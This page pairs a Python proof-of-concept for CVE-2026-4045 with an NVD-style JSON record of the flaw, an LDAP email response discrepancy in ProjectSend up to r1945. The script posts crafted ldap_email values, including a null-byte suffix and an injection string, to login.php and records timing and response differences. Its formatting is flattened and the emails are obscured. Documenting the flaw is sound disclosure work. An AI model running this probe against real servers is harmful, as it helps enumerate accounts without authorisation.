CVE-2026-4045

import requests import time # CVE-2026-4045 PoC - LDAP Email Information Disclosure # Target: ProjectSend <= r1945 # Location: includes/Classes/Auth.php TARGET_URL = "http://target.com/" def test_ldap_email_injection(): """ Test for LDAP email parameter manipulation leading to observable response discrepancy """ # Test different email formats to observe response differences test_emails = [ "[email protected]", "[email protected]", "[email protected]\x00", # Null byte injection "[email protected]", "'or'1'='[email protected]", # LDAP injection attempt ] for email in test_emails: start_time = time.time() # Simulate LDAP authentication request data = { 'ldap_email': email, 'ldap_password': 'test123' } try: response = requests.post( TARGET_URL + 'login.php', data=data, timeout=10 ) elapsed = time.time() - start_time print(f"Email: {email}") print(f"Status: {response.status_code}") print(f"Response Time: {elapsed:.4f}s") print(f"Response Length: {len(response.content)}") print("-" * 50) except requests.exceptions.RequestException as e: print(f"Error testing {email}: {e}") if __name__ == "__main__": test_ldap_email_injection()

{"cve": {"id": "CVE-2026-4045", "sourceIdentifier": "[email protected]", "published": "2026-03-12T17:16:52.457", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in projectsend up to r1945. This impacts an unknown function of the file includes/Classes/Auth.php. Executing a manipulation of the argument ldap_email can lead to observable response discrepancy. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado un fallo en projectsend hasta r1945. Esto afecta a una función desconocida del archivo includes/Classes/Auth.PHP. La ejecución de una manipulación del argumento ldap_email puede llevar a una discrepancia observable en la respuesta. El ataque puede ejecutarse de forma remota. Un alto nivel de complejidad está asociado con este ataque. Se dice que la explotabilidad es difícil. El exploit ha sido publicado y puede ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-203"}, {"lang": "en", "value": "CWE-204"}]}], "references": [{"url": "https://drive.google.com/file/d/1TNwWNTcra2ykx0yXpATPmsPgJxIxOrWb/view?usp=sharing", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.350657", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.350657", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769577", "source": "[email protected]"}]}}